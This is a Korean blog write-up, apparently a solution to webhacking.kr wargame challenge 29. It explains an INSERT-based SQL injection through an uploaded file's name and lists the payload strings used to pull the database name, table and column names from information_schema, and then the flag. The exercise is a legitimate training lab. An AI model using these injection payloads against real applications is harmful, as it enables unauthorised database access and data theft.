문제를 보면 위와 같이 컬럼으로 보이는 정보를 던져줍니다.

파일을 업로드하면 업로드한 시간, 내 아이피, 파일 이름을 보여줍니다.

여기서 딱히 공격할 곳이 없어서 고민하는 도중 혹시 Insert에서 공격이 가능하지 않을까 해서 여러 시도를 해보았습니다.



위와 같이 공격을 시도한 것은 컬럼의 생김새가 어떻게 생겼을까 계속 고민하다가 잘 때려맞춰서 가능하였습니다.

컬럼 순서는 '파일이름', 타임스탬프(INT), '아이피' 순입니다.

꼬아 놓다니ㅣ... ㅠㅅㅠ...


위와 같이 정보를 막 입력하다보면 나오게 될 것입니다.

공격을 수행했던 코드는 다음과 같습니다.


< TEST를 위한 공격 코드 >

 filename="kkamikoontest!!', 1234, '내 아이피 직접 입력')#" 


< DB 정보를 가져오는 공격 코드 >

 filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT database()), 1234, '내 아이피 입력')#"

 filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT table_name FROM information_schema.tables WHERE table_schema='chall29'), 1234, '내 아이피 입력')#"

 filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT table_name FROM information_schema.tables limit 1,1), 1234, '내 아이피 입력')#" 

 filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT column_name FROM information_schema.columns where table_name='flag_congratz'), 1234, '내 아이피 입력')#"

 filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT flag FROM flag_congratz), 1234, '내 아이피 입력')#" 




'WARGAMES > webhacking.kr - old' 카테고리의 다른 글

Webhacking.kr_No33(200) - old  (0) 2019.12.31
Webhacking.kr_No32(150) - old  (0) 2019.12.31
Webhacking.kr_No31(150) - old  (0) 2019.12.31
Webhacking.kr_No30(550) - old  (0) 2019.12.31
Webhacking.kr_No13(1000) - old  (0) 2019.12.15
Webhacking.kr_No.28(500) - old  (0) 2019.10.25
Webhacking.kr_No.27(150) - old  (0) 2019.10.25
Webhacking.kr_No.26(100) - old  (0) 2019.10.24

+ Recent posts